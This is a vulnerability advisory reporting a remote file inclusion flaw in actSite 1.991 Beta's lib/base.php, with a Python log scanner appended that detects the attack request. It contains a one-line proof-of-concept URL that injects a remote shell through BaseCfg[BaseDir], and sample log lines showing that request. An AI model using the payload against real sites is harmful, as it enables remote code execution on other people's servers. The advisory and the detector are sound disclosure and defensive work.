actSite 1.991 Beta (base.php) Remote File Inclusion Vulnerability

2007-10-01 00:00:00

\#'#/

(-.-)

---------------------oOO---(_)---OOo--------------------

| actSite v1.991 Beta (base.php) Remote File Inclusion |

| coded by DNX |

--------------------------------------------------------

[!] Discovered: DNX

[!] Vendor: http://www.actsite.de

[!] Detected: 02.09.2007

[!] Reported: 02.09.2007

[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: $BaseCfg[BaseDir] in lib/base.php



[!] PoC:

- http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]



[!] Solution: Install update to v1.995
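
Added example, not part of the original advisory or of actSite's code: a log check for the request shape shown in the PoC, i.e. lib/base.php requested with a BaseCfg[BaseDir] value that is a remote URL. It assumes a combined-format web server access log; the sample lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that points the include at a remote resource.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
# Parameter name taken from the advisory's PoC line.
PARAM = "BaseCfg[BaseDir]"


def is_rfi_attempt(log_line):
    """True if the line requests lib/base.php with a remote BaseCfg[BaseDir]."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    target = urlsplit(m.group(1))
    if not target.path.lower().endswith("/lib/base.php"):
        return False
    # parse_qsl percent-decodes keys and values, so %5B/%5D brackets
    # and an encoded scheme are matched as well.
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if key == PARAM and REMOTE_RE.match(value):
            return True
    return False


def scan(lines):
    """Return the log lines that match the advisory's request pattern."""
    return [line for line in lines if is_rfi_attempt(line)]


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2007:10:00:00 +0000] "GET /cms/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Oct/2007:10:00:05 +0000] "GET /cms/lib/base.php?BaseCfg[BaseDir]=http://remote.example/x.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Oct/2007:10:00:09 +0000] "GET /cms/lib/base.php?BaseCfg%5BBaseDir%5D=hTTp%3A%2F%2Fremote.example%2Fx.txt HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Oct/2007:10:01:00 +0000] "GET /cms/lib/base.php?BaseCfg[BaseDir]=/var/www/cms/ HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("possible RFI attempt:", hit)
```

The check covers only the query-string form shown in the PoC; any direct request to lib/base.php on an installation older than v1.995 is worth reviewing by hand.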
